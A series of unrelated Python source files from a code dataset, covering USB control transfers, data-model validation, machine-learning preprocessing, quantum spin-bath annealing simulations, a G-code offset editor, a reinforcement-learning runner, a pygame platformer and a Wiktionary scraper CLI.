def get_interface(dev, bInterfaceNumber):
r"""Get the current alternate setting of the interface.
dev is the Device object to which the request will be
sent to.
"""
bmRequestType = util.build_request_type(
util.CTRL_IN,
util.CTRL_TYPE_STANDARD,
util.CTRL_RECIPIENT_INTERFACE
)
return dev.ctrl_transfer(
bmRequestType = bmRequestType,
bRequest = 0x0a,
wIndex = bInterfaceNumber,
data_or_wLength = 1
)[0]
def set_interface(dev, bInterfaceNumber, bAlternateSetting):
r"""Set the alternate setting of the interface.
dev is the Device object to which the request will be
sent to.
"""
dev.set_interface_altsetting(bInterfaceNumber, bAlternateSetting)
| StarcoderdataPython |
252259 | <gh_stars>0
#!python
# coding=utf-8
from .consumer import EasyAvroConsumer
from .producer import EasyAvroProducer, schema
__version__ = "2.2.0"
__all__ = [
'EasyAvroConsumer',
'EasyAvroProducer',
'schema'
]
| StarcoderdataPython |
198467 | <reponame>solex/presto<gh_stars>0
from copy import deepcopy
import simplejson as json
from presto.utils.fields import Field, MultipleObjectsField, FormField
from presto.utils.exceptions import ValidationError
def get_declared_fields(bases, attrs):
"""
Create a list of Model field instances from the passed in 'attrs', plus any
similar fields on the base classes (in 'bases').
"""
fields = [(field_name, attrs.pop(field_name)) \
for field_name, obj in attrs.items() \
if isinstance(obj, Field)]
fields.sort(key=lambda x: x[1].creation_counter)
for base in bases[::-1]:
if hasattr(base, 'declared_fields'):
fields = base.declared_fields.items() + fields
return fields
class DeclarativeFieldsMetaclass(type):
"""
Metaclass that converts Field attributes to a dictionary called
'base_fields', taking into account parent class 'base_fields' as well.
"""
def __new__(cls, name, bases, attrs):
attrs['base_fields'] = get_declared_fields(bases, attrs)
return super(DeclarativeFieldsMetaclass,
cls).__new__(cls, name, bases, attrs)
class Model(object):
"A collection of Fields, plus their associated data."
__metaclass__ = DeclarativeFieldsMetaclass
def __init__(self, data=None, parent=None):
self.data = data or {}
self.parent = parent
self.fields = deepcopy(self.base_fields)
fields = dict(self.fields)
for name, item in self.data.iteritems():
if fields.has_key(name):
field = fields[name]
field.value = self.data.get(name, field.DEFAULT_VALUE)
def __getattr__(self, name):
fields = dict(self.fields)
if fields.has_key(name):
return fields[name].value
return object.__getattribute__(self, name)
def __unicode__(self):
return "Data Model:" % self.data
@property
def errors(self):
"Returns an errors for the data provided for the Model"
if not hasattr(self, '_errors'):
self.clean()
return self._errors
def is_valid(self):
"""
Returns True if the Model has no errors. Otherwise, False.
"""
self.clean()
return not bool(self.errors)
def clean(self):
self._errors = {}
self.cleaned_data = {}
for name, field in self.fields:
if type(field) is MultipleObjectsField:
continue
kwargs = {}
if hasattr(self, 'validate_%s' % name):
kwargs['validation_func'] = getattr(self, 'validate_%s' % name)
if hasattr(self, 'get_text_%s' % name):
kwargs['text_func'] = getattr(self, 'get_text_%s' % name)
if hasattr(self, 'get_extra_params_%s' % name):
kwargs.update(getattr(self, 'get_extra_params_%s' % name)())
try:
self.cleaned_data[name] = field.clean(**kwargs)
except ValidationError, exc:
self._errors[name] = exc.messages
self.from_dict(self.cleaned_data)
def to_dict(self):
dict = {}
for fieldname, field in self.fields:
if type(field) is FormField:
continue
value = field.value
if isinstance(value, (list, tuple)):
dict[fieldname] = [val.to_dict() for val in value]
else:
dict[fieldname] = value
return dict
def from_dict(self, dict):
for fieldname, field in self.fields:
if type(field) is FormField:
continue
value = dict.get(fieldname, field.DEFAULT_VALUE)
field.set_value(value, parent=self)
def filter(self, fieldname, **kwargs):
def apply_filters(item, **kwargs):
for fieldname, value in kwargs.iteritems():
if getattr(item, fieldname) != value:
return False
return True
items = getattr(self, fieldname)
for item in items:
if apply_filters(item, **kwargs):
return item
return None | StarcoderdataPython |
5000400 | <gh_stars>0
from .resort import Resort
| StarcoderdataPython |
3471187 | """Sum the total area (in pixels) covered by a segmentation"""
import argparse
import numpy as np
from skimage.io import use_plugin, imread
use_plugin('freeimage')
def sum_segmented_area(segmentation_file):
im_array = imread(segmentation_file)
area = len(np.where(im_array != 0)[0])
return area
def main():
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('segmentation_file', help="File containing segmentation")
args = parser.parse_args()
    print(sum_segmented_area(args.segmentation_file))
if __name__ == '__main__':
main()
| StarcoderdataPython |
3224183 | # Data Preprocessing Template
# Importing the libraries
import numpy as np
#did this to see entire array
np.set_printoptions(threshold = np.nan)
import matplotlib.pyplot as plt
import pandas as pd
# Importing the dataset
dataset = pd.read_csv('Data.csv')
X = dataset.iloc[:, :-1].values
y = dataset.iloc[:, 3].values
#Taking care of missing data
from sklearn.preprocessing import Imputer
#Do command I for var info about Imputer class
imputer = Imputer(missing_values='NaN', strategy='mean', axis=0)
#selecting indices 1,2 here, lowerbound is inclusive, higherbound is not
imputer = imputer.fit(X[:, 1:3])
#setting the value of X at these indices to the new dataset values
X[:, 1:3] = imputer.transform(X[:, 1:3])
#Encoding categorical data
from sklearn.preprocessing import LabelEncoder, OneHotEncoder
labelencoder_X = LabelEncoder()
X[:, 0] = labelencoder_X.fit_transform(X[:, 0])
onehotencoder = OneHotEncoder(categorical_features = [0])
X = onehotencoder.fit_transform(X).toarray()
labelencoder_y = LabelEncoder()
y = labelencoder_X.fit_transform(y)
#splitting dataset
from sklearn.model_selection import train_test_split
#Random_state was only used to get some results as instructor
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0)
#feature scaling
from sklearn.preprocessing import StandardScaler
sc_X = StandardScaler()
#train set must be fit AND transformed
X_train = sc_X.fit_transform(X_train)
#test must just be transformed
X_test = sc_X.transform(X_test)
| StarcoderdataPython |
6490215 | <reponame>weinbe58/tfim_noise
from quspin.basis import spin_basis_1d,tensor_basis,boson_basis_1d
from quspin.operators import hamiltonian
from quspin.tools.evolution import evolve
import numpy as np
import cProfile,os,sys,time
import matplotlib.pyplot as plt
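# The anneal_bath_* variants below all anneal a transverse-field Ising ring
# from a pure transverse field, B(t) = (1 - t/T)**2, to a ferromagnetic ZZ
# coupling, A(t) = (t/T)**2, while coupled to a single collective spin-S bath
# site with S = Nb/2; they differ in the form of the system-bath coupling and
# in whether those terms are static or follow the A(t)/B(t) schedules.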
def anneal_bath_1(L,Nb,T,gamma=0.2,omega=1.0,path="."):
ti = time.time()
filename = os.path.join(path,"spin_bath_exact_L_{}_Nb_{}_T_{}_gamma_{}_omega_{}.npz".format(L,Nb,T,gamma,omega))
if os.path.isfile(filename):
print "file_exists...exiting run."
exit()
if Nb%2 == 1:
S = "{}/2".format(Nb)
else:
S = "{}".format(Nb//2)
print "creating basis"
spin_basis = spin_basis_1d(L,pauli=True,kblock=0,pblock=1)
bath_basis = spin_basis_1d(1,S=S)
basis = tensor_basis(spin_basis,bath_basis)
print "L={}, H-space size: {}".format(L,basis.Ns)
bath_energy=[[omega/Nb,0]]
SB_list = [[gamma/np.sqrt(Nb),i,0] for i in range(L)]
h_list = [[-1,i] for i in range(L)]
J_list = [[-1,i,(i+1)%L] for i in range(L)]
A = lambda t:(t/T)**2
B = lambda t:(1-t/T)**2
static = [
["|z",bath_energy],
["+|-",SB_list],
["-|+",SB_list]
]
dynamic = [["x|",h_list,B,()],
["zz|",J_list,A,()],
]
print "creating hamiltonian"
kwargs=dict(basis=basis,dtype=np.float64,
check_symm=False,check_pcon=False,check_herm=False)
H = hamiltonian(static,dynamic,**kwargs)
print "solving initial state"
E0,psi_0 = H.eigsh(k=1,which="SA",time=0)
psi_0 = psi_0.ravel()
print "evolving"
out = np.zeros(psi_0.shape,dtype=np.complex128)
psi_f = evolve(psi_0,0,T,H._hamiltonian__omp_SO,f_params = (out,),
solver_name="dop853",atol=1.1e-10,rtol=1.1e-10)
print "saving"
np.savez_compressed(filename,psi=psi_f)
print "dome......{} sec".format(time.time()-ti)
def anneal_bath_2(L,Nb,T,gamma=0.2,omega=1.0,path="."):
ti = time.time()
filename = os.path.join(path,"spin_bath_exact_L_{}_Nb_{}_T_{}_gamma_{}_omega_{}.npz".format(L,Nb,T,gamma,omega))
if os.path.isfile(filename):
print "file_exists...exiting run."
exit()
if Nb%2 == 1:
S = "{}/2".format(Nb)
else:
S = "{}".format(Nb//2)
print "creating basis"
spin_basis = spin_basis_1d(L,pauli=True,kblock=0,pblock=1)
bath_basis = spin_basis_1d(1,S=S)
basis = tensor_basis(spin_basis,bath_basis)
print "L={}, H-space size: {}".format(L,basis.Ns)
bath_energy=[[omega/Nb,0]]
SB_list = [[gamma/np.sqrt(Nb),i,0] for i in range(L)]
h_list = [[-1,i] for i in range(L)]
J_list = [[-1,i,(i+1)%L] for i in range(L)]
A = lambda t:(t/T)**2
B = lambda t:(1-t/T)**2
static = [
["|z",bath_energy],
]
dynamic = [["zz|",J_list,A,()],
["x|",h_list,B,()],
["+|-",SB_list,B,()],
["-|+",SB_list,B,()]
]
print "creating hamiltonian"
kwargs=dict(basis=basis,dtype=np.float64,
check_symm=False,check_pcon=False,check_herm=False)
H = hamiltonian(static,dynamic,**kwargs)
print "solving initial state"
E0,psi_0 = H.eigsh(k=1,which="SA",time=0)
psi_0 = psi_0.ravel()
print "evolving"
out = np.zeros(psi_0.shape,dtype=np.complex128)
psi_f = evolve(psi_0,0,T,H._hamiltonian__omp_SO,f_params = (out,),
solver_name="dop853",atol=1.1e-10,rtol=1.1e-10)
psi_f /= np.linalg.norm(psi_f)
print "saving"
np.savez_compressed(filename,psi=psi_f)
print "dome......{} sec".format(time.time()-ti)
def anneal_bath_3(L,Nb,T,gamma=0.2,omega=1.0,path="."):
ti = time.time()
filename = os.path.join(path,"spin_bath_exact_L_{}_Nb_{}_T_{}_gamma_{}_omega_{}.npz".format(L,Nb,T,gamma,omega))
if os.path.isfile(filename):
print "file_exists...exiting run."
exit()
if Nb%2 == 1:
S = "{}/2".format(Nb)
else:
S = "{}".format(Nb//2)
print "creating basis"
spin_basis = spin_basis_1d(L,pauli=True,kblock=0,pblock=1)
bath_basis = spin_basis_1d(1,S=S)
basis = tensor_basis(spin_basis,bath_basis)
print "L={}, H-space size: {}".format(L,basis.Ns)
bath_energy=[[-omega/Nb**2,0,0]]
SB_list = [[-gamma/Nb,i,0] for i in range(L)]
B_h_list = [[-1,0]]
h_list = [[-1,i] for i in range(L)]
J_list = [[-1,i,(i+1)%L] for i in range(L)]
A = lambda t:(t/T)**2
B = lambda t:(1-t/T)**2
static = []
dynamic = [
["x|",h_list,B,()],
["|+",B_h_list,B,()],
["|-",B_h_list,B,()],
["zz|",J_list,A,()],
["z|z",SB_list,A,()],
["|zz",bath_energy,A,()],
]
print "creating hamiltonian"
kwargs=dict(basis=basis,dtype=np.float64,
check_symm=False,check_pcon=False,check_herm=False)
H = hamiltonian(static,dynamic,**kwargs)
print "solving initial state"
E0,psi_0 = H.eigsh(k=1,which="SA",time=0)
psi_0 = psi_0.ravel()
print "evolving"
out = np.zeros(psi_0.shape,dtype=np.complex128)
psi_f = evolve(psi_0,0,T,H._hamiltonian__omp_SO,f_params = (out,),solver_name="dop853",atol=1.1e-10,rtol=1.1e-10)
print "saving"
np.savez_compressed(filename,psi=psi_f)
print "dome......{} sec".format(time.time()-ti)
def anneal_bath_4(L,Nb,T,gamma=0.2,omega=1.0,path="."):
ti = time.time()
filename = os.path.join(path,"spin_bath_exact_L_{}_Nb_{}_T_{}_gamma_{}_omega_{}.npz".format(L,Nb,T,gamma,omega))
if os.path.isfile(filename):
print "file_exists...exiting run."
exit()
if Nb%2 == 1:
S = "{}/2".format(Nb)
else:
S = "{}".format(Nb//2)
print "creating basis"
spin_basis = spin_basis_1d(L,pauli=True,kblock=0,pblock=1)
bath_basis = spin_basis_1d(1,S=S)
basis = tensor_basis(spin_basis,bath_basis)
print "L={}, H-space size: {}".format(L,basis.Ns)
bath_energy=[[-omega/Nb,0,0]]
SB_1_list = [[-gamma/Nb,i,0] for i in range(L)]
SB_2_list = [[-gamma/np.sqrt(Nb),i,0] for i in range(L)]
B_h_list = [[-1,0]]
h_list = [[-1,i] for i in range(L)]
J_list = [[-1,i,(i+1)%L] for i in range(L)]
A = lambda t:(t/T)**2
B = lambda t:(1-t/T)**2
static = [
["+|-",SB_2_list],
["-|+",SB_2_list],
]
dynamic = [
["x|",h_list,B,()],
["|+",B_h_list,B,()],
["|-",B_h_list,B,()],
["zz|",J_list,A,()],
["z|z",SB_1_list,A,()],
["|zz",bath_energy,A,()],
]
print "creating hamiltonian"
kwargs=dict(basis=basis,dtype=np.float64,
check_symm=False,check_pcon=False,check_herm=False)
H = hamiltonian(static,dynamic,**kwargs)
print "solving initial state"
E0,psi_0 = H.eigsh(k=1,which="SA",time=0)
psi_0 = psi_0.ravel()
print "evolving"
out = np.zeros(psi_0.shape,dtype=np.complex128)
psi_f = evolve(psi_0,0,T,H._hamiltonian__omp_SO,f_params = (out,),solver_name="dop853",atol=1.1e-10,rtol=1.1e-10)
print "saving"
np.savez_compressed(filename,psi=psi_f)
print "dome......{} sec".format(time.time()-ti)
def anneal_bath_5(L,Nb,T,gamma=0.2,omega=1.0,path="."):
ti = time.time()
filename = os.path.join(path,"spin_bath_exact_L_{}_Nb_{}_T_{}_gamma_{}_omega_{}.npz".format(L,Nb,T,gamma,omega))
if os.path.isfile(filename):
print "file_exists...exiting run."
exit()
if Nb%2 == 1:
S = "{}/2".format(Nb)
else:
S = "{}".format(Nb//2)
print "creating basis"
spin_basis = spin_basis_1d(L,pauli=True,kblock=0,pblock=1)
bath_basis = spin_basis_1d(1,S=S)
basis = tensor_basis(spin_basis,bath_basis)
print "L={}, H-space size: {}".format(L,basis.Ns)
bath_energy=[[omega/Nb,0]]
SB_xy_list = [[gamma/(4.0*Nb),i,0] for i in range(L)]
SB_zz_list = [[gamma/(2.0*Nb),i,0] for i in range(L)]
h_list = [[-1,i] for i in range(L)]
J_list = [[-1,i,(i+1)%L] for i in range(L)]
A = lambda t:(t/T)**2
B = lambda t:(1-t/T)**2
static = [
["|z",bath_energy],
]
dynamic = [["zz|",J_list,A,()],
["x|",h_list,B,()],
["+|-",SB_xy_list,B,()],
["-|+",SB_xy_list,B,()],
["z|z",SB_zz_list,B,()],
]
print "creating hamiltonian"
kwargs=dict(basis=basis,dtype=np.float64,
check_symm=False,check_pcon=False,check_herm=False)
H = hamiltonian(static,dynamic,**kwargs)
print "solving initial state"
E0,psi_0 = H.eigsh(k=1,which="SA",time=0)
psi_0 = psi_0.ravel()
print "evolving"
out = np.zeros(psi_0.shape,dtype=np.complex128)
psi_f = evolve(psi_0,0,T,H._hamiltonian__omp_SO,f_params = (out,),solver_name="dop853",atol=1.1e-10,rtol=1.1e-10)
print "saving"
np.savez_compressed(filename,psi=psi_f)
print "dome......{} sec".format(time.time()-ti)
L = int(sys.argv[1])
Nb = int(sys.argv[2])
T = float(sys.argv[3])
gamma = float(sys.argv[4])
omega = float(sys.argv[5])
model = int(sys.argv[6])
path = sys.argv[7]
if model == 1:
anneal_bath_1(L,Nb,T,gamma,omega,path)
elif model == 2:
anneal_bath_2(L,Nb,T,gamma,omega,path)
elif model == 3:
anneal_bath_3(L,Nb,T,gamma,omega,path)
elif model == 4:
anneal_bath_4(L,Nb,T,gamma,omega,path)
elif model == 5:
anneal_bath_5(L,Nb,T,gamma,omega,path)
| StarcoderdataPython |
5132964 | #!/usr/bin/env python3
import fileinput
import re
import sys
"Usage gcode_edit.py gcodeprogram.gcode axis offset -- gcode_edit.py program.gcode X -25"
with fileinput.FileInput(sys.argv[1], inplace=True, backup='.bak') as file:
for line in file:
elements = re.split(' ', line)
for i in range(len(elements)):
if (elements[i].find(str(sys.argv[2])) != -1):
                axis_integer = round(float(elements[i][1:]) - float(sys.argv[3]), 4)
                # This assumes that your origin is the lower left of the table.
                # If your origin is the center of the table, comment out these two lines.
                if (axis_integer < 0):
                    axis_integer = 0
elements[i]=(str(sys.argv[2])+str(axis_integer))
fixed_line = ' '.join(elements)
print(fixed_line, end='')
| StarcoderdataPython |
1897273 | # Generated with StressType
#
from enum import Enum
from enum import auto
class StressType(Enum):
""""""
AXIAL_BENDING = auto()
TRUE_WALL = auto()
AXIAL_STRESS = auto()
VON_MISES = auto()
def label(self):
if self == StressType.AXIAL_BENDING:
return "Axial bending stress"
if self == StressType.TRUE_WALL:
return "True wall axial stress"
if self == StressType.AXIAL_STRESS:
return "Resultant axial stress"
if self == StressType.VON_MISES:
return "Von mises stress" | StarcoderdataPython |
4908376 | <reponame>roiyeho/drl-book
import numpy as np
import matplotlib.pyplot as plt
import time
import os
import gym
class EnvRunner:
def __init__(self,
env,
agent,
n_episodes=1000,
test_env=None,
test_episode_max_len=10000,
check_solved=True,
win_trials=100,
win_mean_reward=195,
stats_interval=100,
):
"""
:param env: an instance of gym environment
:param agent: the agent instance
:param n_episodes: number of episodes used for training
:param test_env: the environment used for testing. If None, use the same
environment used for training.
:param test_episode_max_len: maximum number of steps used for evaluation
:param check_solved: whether to check if the environment was solved
:param win_trials: number of consecutive trials considered for
checking if the environment was solved
:param win_mean_reward: mean of rewards that needs to be achieved
for the environment to be considered solved
:param stats_interval: how frequently to compute statistics
"""
self.env = env
self.agent = agent
self.n_episodes = n_episodes
self.test_env = env if test_env is None else test_env
self.test_episode_max_len = test_episode_max_len
self.check_solved = check_solved
self.win_trials = win_trials
self.win_mean_reward = win_mean_reward
self.stats_interval = stats_interval
self.create_results_folder()
def create_results_folder(self, **kwargs):
params_str = ''
for key, value in kwargs.items():
params_str += f'-{key}{value}'
time_str = time.strftime("%Y%m%d-%H%M%S")
self.results_folder = os.path.join('results', f'{self.env.spec.id}-{time_str}{params_str}')
os.makedirs(self.results_folder)
# Create the results file
filename = os.path.join(self.results_folder, 'results.txt')
self.results_file = open(filename, 'w')
print('#Episode Reward', file=self.results_file)
def run(self):
total_rewards = [] # stores the total reward per episode
start_time = time.time()
total_steps = 0
for episode in range(self.n_episodes):
done = False
total_reward = 0
step = 0 # counts the time steps in this episode
states, actions, rewards = [], [], []
state = self.env.reset()
# Run an episode
while not done:
action = self.agent.select_action(state)
next_state, reward, done, info = self.env.step(action)
states.append(state)
actions.append(action)
rewards.append(reward)
state = next_state
total_reward += reward
step += 1
total_steps += 1
# Train the agent at the end of the episode
self.agent.train(states, actions, rewards)
# Store the total reward
total_rewards.append(total_reward)
print(f'Episode: {episode + 1}, steps: {step}, reward: {total_reward}')
self.save_result(episode, total_reward)
# Check if the environment was solved
if self.check_solved and self.is_env_solved(episode, total_rewards, total_steps, start_time):
break
# Compute the mean total reward in the last 100 episodes
if (episode + 1) % self.stats_interval == 0:
self.compute_stats(episode, total_rewards, total_steps, start_time)
self.end_experiment(total_rewards)
def is_env_solved(self, episode, total_rewards, total_steps, start_time):
mean_reward = np.mean(total_rewards[-self.win_trials:])
if mean_reward >= self.win_mean_reward and \
episode >= self.win_trials:
elapsed_time = int(time.time() - start_time)
print('=' * 95)
print(f'Solved in episode {episode}, '
f'mean reward: {mean_reward}, '
f'total steps: {total_steps}, '
f'elapsed time: {elapsed_time} sec')
self.evaluate_agent(episode)
print('=' * 95)
return True
return False
def compute_stats(self, episode, total_rewards, total_steps, start_time):
mean_reward = np.mean(total_rewards[-self.win_trials:])
elapsed_time = int(time.time() - start_time)
print('=' * 85)
print(f'Episode {episode + 1}: mean reward = {mean_reward}, '
f'total steps = {total_steps}, elapsed time = {elapsed_time} sec')
self.evaluate_agent(episode)
print('=' * 85)
self.agent.save_model(self.results_folder, self.env.spec.id)
def end_experiment(self, total_rewards):
self.results_file.close()
self.agent.save_model(self.results_folder, self.env.spec.id)
self.plot_rewards(total_rewards)
def save_result(self, episode, reward):
print(episode + 1, reward, file=self.results_file)
self.results_file.flush()
def plot_rewards(self, rewards):
x = range(0, len(rewards))
plt.plot(x, rewards)
plt.xlabel('Episode', fontsize=12)
plt.ylabel('Total reward', fontsize=12)
plt.title('Learning curve', fontsize=14)
graph_file = os.path.join(self.results_folder, f'{self.env.spec.id}.png')
plt.savefig(graph_file)
def plot_results_from_file(self, file_path):
rewards = np.loadtxt(file_path)
self.plot_rewards(rewards)
def evaluate_agent(self, episode):
# Add a Monitor wrapper for recording a video
video_folder = os.path.join(self.results_folder, f'videos/e{episode + 1}')
env = gym.wrappers.Monitor(self.test_env, video_folder)
done = False
total_reward = 0
step = 0
state = env.reset()
# Run an episode on the wrapped environment with exploration turned off
while not done and step < self.test_episode_max_len:
action = self.agent.select_action(state)
next_state, reward, done, _ = env.step(action)
state = next_state
step += 1
total_reward += reward
print(f'Agent evaluation: steps = {step}, reward = {total_reward}') | StarcoderdataPython |
6516322 | import json
import random
import pygame
import os
from adventure import sound
from adventure import clock
from adventure import camera
from adventure import texture
from adventure import character
from bintrees import rbtree
FULL_SCREEN_FLAG = pygame.FULLSCREEN | pygame.HWSURFACE | pygame.DOUBLEBUF;
BGCOLOR = (20, 20, 20)
GRAVITY = 800
class Adventure:
initialized = False
ready = False
window_width = 0;
window_height = 0;
canvas_width = 0;
canvas_height = 0;
screen = None
font = None
clock = None
level = None
canvas = None
ui = None
draw_ui = False
delay = 0;
done = False
scale = 1
camera = None
default_camera = None
debug_camera = None
world_col = 64
world_row = 64
block_size = 32
debug = False
world = None
blocks = None
texture = texture.Texture("res/texture")
start_point = None
sound_master = None
# tmp for test
# ------------------------------
dir = 0
background = []
camera_background = []
ch = None
def init(self, config_obj):
if not self.initialized:
if os.name == 'nt':
# is current os is windows fix dpi
import ctypes
ctypes.windll.user32.SetProcessDPIAware()
# window config
# ---------------------------------------------------------------------
window_config = config_obj["window"]
full_screen = window_config["fullScreen"]
window_width = window_config["width"] if full_screen else window_config["width"];
window_height = window_config["height"] if full_screen else window_config["height"];
window_flag = FULL_SCREEN_FLAG if full_screen else 0
# font config
# ---------------------------------------------------------------------
font_config = config_obj["font"]
font_family = font_config["family"]
font_size = font_config["size"]
# clock config
# ---------------------------------------------------------------------
max_fps = config_obj['fps']
self.clock = clock.GameClock(max_fps)
# ui
# ---------------------------------------------------------------------
self.ui = pygame.Surface((window_width, window_height))
# sound
self.sound_master = sound.SoundMaster()
# level
# ---------------------------------------------------------------------
self.level = config_obj['mainLevel']
# init pygame
pygame.init()
# init font module
pygame.font.init()
self.screen = pygame.display.set_mode((window_width, window_height), window_flag)
self.window_width, self.window_height = self.screen.get_size();
self.font = pygame.font.SysFont(font_family, font_size)
self.load_level(self.level)
self.initialized = True
self.dir = 4
def start(self):
self.clock.tick()
while not self.done:
for event in pygame.event.get():
if event.type == pygame.QUIT:
self.done = True;
continue;
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_F8:
self.debug = not self.debug
if self.debug:
self.camera = self.debug_camera
self.camera.pos = self.default_camera.pos
self.camera.update_camera_rect()
else:
self.camera = self.default_camera
if event.key == pygame.K_r:
self.restart()
break
if event.type == pygame.MOUSEBUTTONDOWN:
if self.debug:
if event.button == 4 or event.button == 5:
delta = -0.01 if event.button == 4 else 0.01
self.debug_camera.set_scale(self.debug_camera.scale + delta)
self.screen.fill((0, 0, 0))
if not self.ready:
continue
vx = self.lerp(self.default_camera.pos['x'], self.ch.x, 10 * self.delay)
vy = self.lerp(self.default_camera.pos['y'], self.ch.y, 10 * self.delay)
self.default_camera.pos["x"] = vx
self.default_camera.pos["y"] = vy
self.default_camera.update_camera_rect()
self.draw_camera_background()
self.draw_blocks()
self.draw_background()
self.ch.handle(pygame.key.get_pressed())
self.ch.update(self.delay)
self.ch.draw(self.canvas)
self.sound_master.update(self.delay)
# ------ debug ------ #
if self.debug:
self.default_camera.draw_camera_gird(self.canvas)
px, py = self.debug_camera.get_mouse_hover_point();
pygame.draw.rect(self.canvas, (255, 0, 0),
(px * self.block_size, py * self.block_size, self.block_size, self.block_size), 2)
pygame.draw.rect(self.canvas, (0, 255, 0), self.default_camera.rect, 2)
self.camera.surface.blit(self.canvas.subsurface(self.camera.rect), (0, 0))
self.screen.blit(pygame.transform.smoothscale(self.camera.surface, (self.window_width, self.window_height)),
(self.camera.offset_x, self.camera.offset_y))
self.screen.blit(self.font.render(str(self.clock.get_fps()), True, (255, 0, 0)), (0, 0))
pygame.display.update()
if self.camera.offset_x > 0 or self.camera.offset_y > 0:
self.screen.fill((0, 0, 0))
pygame.draw.rect(self.canvas, BGCOLOR, self.default_camera.rect, 0)
self.delay = self.clock.tick()
def load_level(self, level):
level_file_name = "./level/" + level;
level_file = open(level_file_name, "r")
level_obj = json.load(level_file)
self.world_row = level_obj['worldRow']
self.world_col = level_obj['worldCol']
self.block_size = level_obj['blockSize']
self.scale = level_obj['scale']
self.canvas = pygame.Surface(((self.world_col * self.block_size) + 1, (self.world_row * self.block_size) + 1))
self.canvas_width, self.canvas_height = self.canvas.get_size()
self.default_camera = camera.Camera(self.scale,
(self.canvas_width, self.canvas_height),
(self.window_width, self.window_height),
(self.canvas_width, self.canvas_height), self.block_size)
self.debug_camera = camera.Camera(1,
(self.canvas_width / 2, self.canvas_height),
(self.window_width, self.window_height),
(self.canvas_width, self.canvas_height), self.block_size)
self.camera = self.default_camera
self.camera.update_camera_rect()
self.start_point = level_obj["start"]
self.ch = character.Character(self.start_point["x"], self.start_point["y"], 32, 32)
self.default_camera.pos['x'] = self.ch.x;
self.default_camera.pos['y'] = self.ch.y;
self.background = []
self.camera_background = []
self.world = rbtree.RBTree()
self.blocks = level_obj["blocks"]
index = 0
for block in self.blocks:
self.new_block(block, index)
index += 1
self.ready = True
for bg in level_obj["camera_background"]:
x = self.default_camera.rect.w * bg["x"]
y = self.default_camera.rect.h * bg["y"]
key = bg["key"]
self.camera_background.append((x, y, key))
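    # Register every grid cell covered by a level block in the red-black-tree
    # world index (row -> column -> block id) and, when the block defines a
    # "gen" entry, probabilistically scatter decorative background sprites.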
def new_block(self, block, block_id):
x = block['x']
y = block['y']
w = block['w']
h = block['h']
for row in range(0, h):
for col in range(0, w):
pos_y = y + row
if pos_y not in self.world:
self.world.insert(pos_y, rbtree.RBTree())
row_tree = self.world[pos_y]
pos_x = x + col
row_tree.insert(pos_x, block_id)
if "gen" in block:
obj = block["gen"]
prob = 0 if "prob" not in block else block["prob"]
if random.randint(0, 100) < prob:
index = random.randint(0, len(obj) - 1)
self.background.append((pos_x + obj[index]["x"], pos_y + obj[index]["y"], obj[index]["key"]))
def get_block_id(self, x, y):
result = None
if y in self.world:
if x in self.world[y]:
result = self.world[y][x]
return result
def draw_blocks(self):
camera_block = pygame.Rect(self.default_camera.get_camere_block())
for block in self.blocks:
x = block['x']
y = block['y']
if 'drawAbove' in block:
y -= 1
w = block['w']
h = block['h']
init_x = x * self.block_size
init_y = y * self.block_size
t = self.texture.get_texture(block["name"])
if camera_block.colliderect((x, y, w, h)):
if block['draw'] == "fill":
self.canvas.blit(t, (init_x, init_y))
elif block['draw'] == "repeat":
offset_y = 0
while offset_y < h:
offset_x = 0
while offset_x < w:
if camera_block.collidepoint(x + offset_x, y + offset_y):
pos_x = init_x + offset_x * self.block_size
pos_y = init_y + offset_y * self.block_size
self.canvas.blit(t, (pos_x, pos_y))
offset_x += 1
offset_y += 1
def draw_background(self):
camera_block = pygame.Rect(self.default_camera.get_camere_block())
for shit in self.background:
x, y, key = shit
t = self.texture.get_texture(key)
if camera_block.collidepoint(x, y):
self.canvas.blit(t, (x * self.block_size, (y * self.block_size)))
def draw_camera_background(self):
for bg in self.camera_background:
x, y, key = bg
t = self.texture.get_texture(key)
self.canvas.blit(t, (self.default_camera.rect.x + x, self.default_camera.rect.y + y))
@staticmethod
def lerp(v1, v2, f):
return v1 + ((v2 - v1) * f)
def restart(self):
self.ch.x = self.start_point["x"]
self.ch.y = self.start_point["y"]
self.ch.vx = 0
self.ch.vy = 0
default = Adventure()
| StarcoderdataPython |
4867925 | <gh_stars>1-10
import click
import wiktionarifier.scrape.core as sc
import wiktionarifier.scrape.db as sdb
import wiktionarifier.format.core as fc
@click.group()
def top():
pass
@click.command(help="Scrape entries from wiktionary for use as training data.")
@click.option("--output-dir", default="data/scraped", help="directory for scraping output")
@click.option("--wiktionary-language", default="en", help="Language in which definitions are written on Wiktionary")
@click.option(
"--strategy",
default="random",
type=click.Choice(["inorder", "random"], case_sensitive=False),
help="Method for deciding which Wiktionary pages to visit. `inorder` visits all pages in lexicographic "
"order, while `random` will sample them randomly.",
)
@click.option("--max-pages", default=50000, help="Stop scraping after collecting this number of pages")
@click.option("--overwrite/--no-overwrite", default=False, help="If true, discard all previous scraping results")
def scrape(output_dir, wiktionary_language, strategy, max_pages, overwrite):
if not overwrite or (overwrite and click.confirm("Are you SURE you want to discard previous scraping results?")):
sc.scrape(output_dir, wiktionary_language, strategy, max_pages, overwrite)
@click.command(help="Turn scraped output into .conllu files")
@click.option("--input-dir", default="data/scraped", help="Directory containing scraping output")
@click.option("--output-dir", default="data/conllu", help="Directory conllu files will be written to")
@click.option(
"--write-individual-file/--no-write-individual-file",
default=False,
help="If true, make a separate .conllu file for each entry",
)
def format(input_dir, output_dir, write_individual_file):
if not sdb.db_exists(input_dir):
click.secho(f"No scraping database found at {input_dir}", fg="red")
fc.format(input_dir, output_dir)
top.add_command(scrape)
top.add_command(format)
if __name__ == "__main__":
top()
| StarcoderdataPython |